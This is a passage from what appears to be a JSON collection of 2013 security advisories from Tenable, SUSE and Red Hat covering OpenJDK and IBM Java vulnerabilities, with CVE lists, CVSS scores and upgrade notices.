Virtual Machine memory and bypass Java sandbox restrictions.\n(CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the javax.xml.transform package transformers. A remote attacker could use this flaw to supply a crafted XML that would be processed without the intended security restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components processes XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.\n(CVE-2013-3829, CVE-2013-5840, CVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5851, CVE-2013-5800, CVE-2013-5849, CVE-2013-5790, CVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly check bounds when performing image conversions. An untrusted Java application or applet could use this flaw to disclose portions of the Java Virtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting attacks.\n(CVE-2013-5804, CVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak private key information by including sensitive data in strings returned by toString() methods. These flaws could possibly lead to an unexpected exposure of sensitive key data. (CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added into the HTML pages it generated. Crafted content in the memory of a Java program analyzed using jhat could possibly be used to conduct cross-site scripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC responses. A malformed packet could cause a Java application using JGSS to exit. (CVE-2013-5803)\n\nNote: If the web browser plug-in provided by the icedtea-web package was installed, the issues exposed via Java applets could have been exploited without user interaction if a user visited a malicious website.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.", "published": "2013-10-23T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=70554", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5838", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2017-10-29T13:33:53"}], "suse": [{"id": "SUSE-SU-2013:1669-1", "type": "suse", "title": "Security update for IBM Java 5 (important)", "description": "IBM Java 5 SR16-FP4 has been released which fixes lots of\n bugs and security issues.\n\n More information can be found on:\n <a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>\n &lt;<a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>&gt;\n\n The following CVEs are fixed:\n CVE-2013-4041,CVE-2013-5375,CVE-2013-5372,CVE-2013-5843,CVE-\n 2013-5830,CVE-2013-5829,CVE-2013-5842,CVE-2013-5782,CVE-2013\n -5817,CVE-2013-5809,CVE-2013-5814,CVE-2013-5802,CVE-2013-580\n 4,CVE-2013-5783,CVE-2013-3829,CVE-2013-4002,CVE-2013-5774,CV\n E-2013-5825,CVE-2013-5840,CVE-2013-5801,CVE-2013-5778,CVE-20\n 13-5849,CVE-2013-5790,CVE-2013-5780,CVE-2013-5797,CVE-2013-5\n 803\n\n\n", "published": "2013-11-14T16:04:15", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.opensuse.org/opensuse-security-announce/2013-11/msg00012.html", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5778", "CVE-2013-5375", "CVE-2013-5842", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5372", "CVE-2013-5843", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-4041", "CVE-2013-5829", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5790", "CVE-2013-5840", "CVE-2013-5801", "CVE-2013-5797"], "lastseen": "2016-09-04T11:18:18"}, {"id": "SUSE-SU-2013:1666-1", "type": "suse", "title": "Security update for OpenJDK 7 (important)", "description": "This release updates our OpenJDK 7 support in the 2.4.x\n series with a number of security fixes and synchronises it\n with upstream development. The security issues fixed (a\n long list) can be found in the following link:\n\n <a rel=\"nofollow\" href=\"http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2013-O\">http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2013-O</a>\n ctober/025087.html\n &lt;<a rel=\"nofollow\" href=\"http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2013-\">http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2013-</a>\n October/025087.html&gt;\n", "published": "2013-11-13T15:04:17", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.opensuse.org/opensuse-security-announce/2013-11/msg00010.html", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2013-5806", "CVE-2013-5805", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2016-09-04T11:39:29"}, {"id": "SUSE-SU-2013:1677-3", "type": "suse", "title": "Security update for IBM Java 7 (important)", "description": "IBM Java 7 SR6 has been released and fixes lots of bugs and\n security issues.\n\n More information can be found on:\n <a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>\n &lt;<a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>&gt;\n", "published": "2013-11-22T08:04:19", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.opensuse.org/opensuse-security-announce/2013-11/msg00022.html", "cvelist": ["CVE-2013-5848", "CVE-2013-5782", "CVE-2013-5818", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5375", "CVE-2013-5776", "CVE-2013-5788", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5832", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2013-5787", "CVE-2013-5372", "CVE-2013-5825", "CVE-2013-5789", "CVE-2013-5823", "CVE-2013-5843", "CVE-2013-5812", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5456", "CVE-2013-5824", "CVE-2013-5831", "CVE-2013-5458", "CVE-2013-5814", "CVE-2013-4041", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5819", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-5457", "CVE-2013-5790", "CVE-2013-5838", "CVE-2013-5840", "CVE-2013-5801", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2016-09-04T11:38:36"}, {"id": "SUSE-SU-2013:1677-1", "type": "suse", "title": "Security update for IBM Java 5 (important)", "description": "IBM Java 5 SR16-FP4 has been released which fixes lots of\n bugs and security issues.\n\n More information can be found on:\n <a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>\n &lt;<a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>&gt;\n", "published": "2013-11-15T00:04:35", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.opensuse.org/opensuse-security-announce/2013-11/msg00013.html", "cvelist": ["CVE-2013-5848", "CVE-2013-5782", "CVE-2013-5818", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5375", "CVE-2013-5776", "CVE-2013-5788", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5832", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2013-5787", "CVE-2013-5372", "CVE-2013-5825", "CVE-2013-5789", "CVE-2013-5823", "CVE-2013-5843", "CVE-2013-5812", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5456", "CVE-2013-5824", "CVE-2013-5831", "CVE-2013-5458", "CVE-2013-5814", "CVE-2013-4041", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5819", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-5457", "CVE-2013-5790", "CVE-2013-5838", "CVE-2013-5840", "CVE-2013-5801", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2016-09-04T11:56:36"}, {"id": "SUSE-SU-2013:1677-2", "type": "suse", "title": "Security update for Java 6 (important)", "description": "IBM Java 6 SR15 has been released which fixes lots of bugs\n and security issues.\n\n More information can be found on:\n <a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>\n &lt;<a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>&gt;\n", "published": "2013-11-19T00:04:12", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.opensuse.org/opensuse-security-announce/2013-11/msg00018.html", "cvelist": ["CVE-2013-5848", "CVE-2013-5782", "CVE-2013-5818", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5375", "CVE-2013-5776", "CVE-2013-5788", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5832", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2013-5787", "CVE-2013-5372", "CVE-2013-5825", "CVE-2013-5789", "CVE-2013-5823", "CVE-2013-5843", "CVE-2013-5812", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5456", "CVE-2013-5824", "CVE-2013-5831", "CVE-2013-5458", "CVE-2013-5814", "CVE-2013-4041", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5819", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-5457", "CVE-2013-5790", "CVE-2013-5838", "CVE-2013-5840", "CVE-2013-5801", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2016-09-04T11:40:21"}, {"id": "SUSE-SU-2013:1263-2", "type": "suse", "title": "Security update for java-1_5_0-ibm (important)", "description": "IBM Java 1.5.0 was updated to SR16-FP3 to fix bugs and\n security issues:\n\n CVE-2013-3009, CVE-2013-3011, CVE-2013-3012, CVE-2013-4002,\n CVE-2013-2469, CVE-2013-2465, CVE-2013-2464,\n CVE-2013-2463, CVE-2013-2473, CVE-2013-2472,\n CVE-2013-2471, CVE-2013-2470, CVE-2013-2459, CVE-2013-3743,\n CVE-2013-2448, CVE-2013-2454, CVE-2013-2456,\n CVE-2013-2457, CVE-2013-2455, CVE-2013-2443,\n CVE-2013-2447, CVE-2013-2444, CVE-2013-2452, CVE-2013-2446,\n CVE-2013-2450, CVE-2013-1571, CVE-2013-1500\n\n Please see also\n <a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>\n\n Additionally, the following bugs have been fixed: - Add\n Europe/Busingen to tzmappings (bnc#817062) - Mark files in\n jre/bin and bin/ as executable (bnc#823034).\n\n Security Issues:\n\n * CVE-2013-3009\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3009\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3009</a>\n &gt;\n * CVE-2013-3011\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3011\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3011</a>\n &gt;\n * CVE-2013-3012\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3012\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3012</a>\n &gt;\n * CVE-2013-2469\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2469\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2469</a>\n &gt;\n * CVE-2013-4002\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4002\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4002</a>\n &gt;\n * CVE-2013-2465\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2465\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2465</a>\n &gt;\n * CVE-2013-2464\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2464\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2464</a>\n &gt;\n * CVE-2013-2463\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2463\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2463</a>\n &gt;\n * CVE-2013-2473\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2473\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2473</a>\n &gt;\n * CVE-2013-2472\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2472\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2472</a>\n &gt;\n * CVE-2013-2471\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2471\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2471</a>\n &gt;\n * CVE-2013-2470\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2470\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2470</a>\n &gt;\n * CVE-2013-2459\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2459\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2459</a>\n &gt;\n * CVE-2013-3743\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3743\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3743</a>\n &gt;\n * CVE-2013-2448\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2448\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2448</a>\n &gt;\n * CVE-2013-2454\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2454\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2454</a>\n &gt;\n * CVE-2013-2457\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2457\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2457</a>\n &gt;\n * CVE-2013-2456\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2456\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2456</a>\n &gt;\n * CVE-2013-2455\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2455\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2455</a>\n &gt;\n * CVE-2013-2443\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2443\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2443</a>\n &gt;\n * CVE-2013-2444\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2444\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2444</a>\n &gt;\n * CVE-2013-2447\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2447\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2447</a>\n &gt;\n * CVE-2013-2452\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2452\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2452</a>\n &gt;\n * CVE-2013-2446\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2446\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2446</a>\n &gt;\n * CVE-2013-2450\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2450\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2450</a>\n &gt;\n * CVE-2013-1571\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1571\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1571</a>\n &gt;\n * CVE-2013-1500\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1500\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1500</a>\n &gt;\n\n\n", "published": "2013-07-30T17:04:11", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00032.html", "cvelist": ["CVE-2013-3012", "CVE-2013-1571", "CVE-2013-1500", "CVE-2013-2448", "CVE-2013-4002", "CVE-2013-3011", "CVE-2013-2456", "CVE-2013-2454", "CVE-2013-2470", "CVE-2013-2452", "CVE-2013-2473", "CVE-2013-2463", "CVE-2013-2469", "CVE-2013-2465", "CVE-2013-3743", "CVE-2013-3009", "CVE-2013-2471", "CVE-2013-2464", "CVE-2013-2459", "CVE-2013-2443", "CVE-2013-2446", "CVE-2013-2450", "CVE-2013-2472", "CVE-2013-2444", "CVE-2013-2447", "CVE-2013-2457", "CVE-2013-2455"], "lastseen": "2016-09-04T11:27:55"}, {"id": "SUSE-SU-2013:1293-1", "type": "suse", "title": "Security update for IBMJava5 JRE and IBMJava5 SDK (important)", "description": "IBM Java 1.5.0 was updated to SR16-FP3 to fix bugs and\n security issues:\n\n CVE-2013-3009, CVE-2013-3011, CVE-2013-3012, CVE-2013-4002\n CVE-2013-2469, CVE-2013-2465, CVE-2013-2464, CVE-2013-2463,\n CVE-2013-2473, CVE-2013-2472, CVE-2013-2471, CVE-2013-2470,\n CVE-2013-2459, CVE-2013-3743, CVE-2013-2448, CVE-2013-2454,\n CVE-2013-2456 CVE-2013-2457, CVE-2013-2455, CVE-2013-2443,\n CVE-2013-2447 CVE-2013-2444, CVE-2013-2452, CVE-2013-2446,\n CVE-2013-2450, CVE-2013-1571, CVE-2013-1500\n\n Please see also\n <a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>\n &lt;<a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>&gt;\n\n Also the following bugs have been fixed:\n\n * add Europe/Busingen to tzmappings (bnc#817062)\n * mark files in jre/bin and bin/ as executable\n (bnc#823034)\n\n\n", "published": "2013-08-02T23:04:12", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.opensuse.org/opensuse-security-announce/2013-08/msg00000.html", "cvelist": ["CVE-2013-3012", "CVE-2013-1571", "CVE-2013-1500", "CVE-2013-2448", "CVE-2013-4002", "CVE-2013-3011", "CVE-2013-2456", "CVE-2013-2454", "CVE-2013-2470", "CVE-2013-2452", "CVE-2013-2473", "CVE-2013-2463", "CVE-2013-2469", "CVE-2013-2465", "CVE-2013-3743", "CVE-2013-3009", "CVE-2013-2471", "CVE-2013-2464", "CVE-2013-2459", "CVE-2013-2443", "CVE-2013-2446", "CVE-2013-2450", "CVE-2013-2472", "CVE-2013-2444", "CVE-2013-2447", "CVE-2013-2457", "CVE-2013-2455"], "lastseen": "2016-09-04T12:14:44"}, {"id": "SUSE-SU-2013:1263-1", "type": "suse", "title": "Security update for java-1_5_0-ibm (important)", "description": "IBM Java 1.5.0 has been updated to SR16-FP3 to fix bugs and\n security issues.\n\n Please see also\n <a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>\n &lt;<a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>&gt;\n\n Also the following bug has been fixed:\n\n * add Europe/Busingen to tzmappings (bnc#817062)\n * mark files in jre/bin and bin/ as executable\n (bnc#823034)\n", "published": "2013-07-27T17:04:14", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00029.html", "cvelist": ["CVE-2013-3012", "CVE-2013-1571", "CVE-2013-1500", "CVE-2013-2448", "CVE-2013-4002", "CVE-2013-3011", "CVE-2013-2456", "CVE-2013-2454", "CVE-2013-2470", "CVE-2013-2452", "CVE-2013-2473", "CVE-2013-2463", "CVE-2013-2469", "CVE-2013-2465", "CVE-2013-3743", "CVE-2013-3009", "CVE-2013-2471", "CVE-2013-2464", "CVE-2013-2459", "CVE-2013-2443", "CVE-2013-2446", "CVE-2013-2450", "CVE-2013-2472", "CVE-2013-2444", "CVE-2013-2447", "CVE-2013-2457", "CVE-2013-2455"], "lastseen": "2016-09-04T12:43:37"}, {"id": "SUSE-SU-2013:1305-1", "type": "suse", "title": "Security update for IBM Java 1.6.0 (important)", "description": "IBM Java 1.6.0 has been updated to SR14 to fix bugs and\n security issues.\n\n Please see also\n <a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>\n &lt;<a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>&gt;\n\n Also the following bugs have been fixed:\n\n * add Europe/Busingen to tzmappings (bnc#817062)\n * mark files in jre/bin and bin/ as executable\n (bnc#823034)\n * check if installed qa_filelist is not empty\n (bnc#831936)\n", "published": "2013-08-06T23:04:12", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.opensuse.org/opensuse-security-announce/2013-08/msg00003.html", "cvelist": ["CVE-2013-3012", "CVE-2013-2468", "CVE-2013-1571", "CVE-2013-1500", "CVE-2013-2448", "CVE-2013-4002", "CVE-2013-3011", "CVE-2013-2407", "CVE-2013-2456", "CVE-2013-2454", "CVE-2013-2470", "CVE-2013-2452", "CVE-2013-2451", "CVE-2013-2473", "CVE-2013-2463", "CVE-2013-2469", "CVE-2013-2465", "CVE-2013-3743", "CVE-2013-3009", "CVE-2013-2471", "CVE-2013-2464", "CVE-2013-2459", "CVE-2013-2442", "CVE-2013-2443", "CVE-2013-2446", "CVE-2013-2450", "CVE-2013-2472", "CVE-2013-2444", "CVE-2013-2447", "CVE-2013-2457", "CVE-2013-2437", "CVE-2013-2453", "CVE-2013-2455", "CVE-2013-2412", "CVE-2013-2466"], "lastseen": "2016-09-04T12:09:50"}, {"id": "SUSE-SU-2013:1255-1", "type": "suse", "title": "Security update for java-1_6_0-ibm (important)", "description": "IBM Java 1.6.0 has been updated to SR14 to fix bugs and\n security issues.\n\n Please see also\n <a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>\n &lt;<a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>&gt;\n\n Also the following bugs have been fixed:\n\n * add Europe/Busingen to tzmappings (bnc#817062)\n * mark files in jre/bin and bin/ as executable\n (bnc#823034)\n", "published": "2013-07-25T20:04:13", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00026.html", "cvelist": ["CVE-2013-3012", "CVE-2013-2468", "CVE-2013-1571", "CVE-2013-1500", "CVE-2013-2448", "CVE-2013-4002", "CVE-2013-3011", "CVE-2013-2407", "CVE-2013-2456", "CVE-2013-2454", "CVE-2013-2470", "CVE-2013-2452", "CVE-2013-2451", "CVE-2013-2473", "CVE-2013-2463", "CVE-2013-2469", "CVE-2013-2465", "CVE-2013-3743", "CVE-2013-3009", "CVE-2013-2471", "CVE-2013-2464", "CVE-2013-2459", "CVE-2013-2442", "CVE-2013-2443", "CVE-2013-2446", "CVE-2013-2450", "CVE-2013-2472", "CVE-2013-2444", "CVE-2013-2447", "CVE-2013-2457", "CVE-2013-2437", "CVE-2013-2453", "CVE-2013-2455", "CVE-2013-2412", "CVE-2013-2466"], "lastseen": "2016-09-04T11:59:55"}], "redhat": [{"id": "RHSA-2013:1505", "type": "redhat", "title": "(RHSA-2013:1505) Important: java-1.6.0-openjdk security update", "description": "The java-1.6.0-openjdk packages provide the OpenJDK 6 Java Runtime\nEnvironment and the OpenJDK 6 Java Software Development Kit.\n\nMultiple input checking flaws were found in the 2D component native image\nparsing code. A specially crafted image file could trigger a Java Virtual\nMachine memory corruption and, possibly, lead to arbitrary code execution\nwith the privileges of the user running the Java Virtual Machine.\n(CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public\nproxy classes. A remote attacker could possibly use this flaw to execute\narbitrary code with the privileges of the user running the Java Virtual\nMachine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA,\nJNDI, and Libraries components in OpenJDK. An untrusted Java application or\napplet could use these flaws to bypass Java sandbox restrictions.\n(CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850)\n\nMultiple input checking flaws were discovered in the JPEG image reading and\nwriting code in the 2D component. An untrusted Java application or applet\ncould use these flaws to corrupt the Java Virtual Machine memory and bypass\nJava sandbox restrictions. (CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the\njavax.xml.transform package transformers. A remote attacker could use this\nflaw to supply a crafted XML that would be processed without the intended\nsecurity restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components\nprocesses XML inputs. A remote attacker could create a crafted XML that\nwould cause a Java application to use an excessive amount of CPU and memory\nwhen processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries,\nSwing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An\nuntrusted Java application or applet could use these flaws to bypass\ncertain Java sandbox restrictions. (CVE-2013-3829, CVE-2013-5840,\nCVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5849, CVE-2013-5790,\nCVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly\ncheck bounds when performing image conversions. An untrusted Java\napplication or applet could use this flaw to disclose portions of the Java\nVirtual Machine memory. 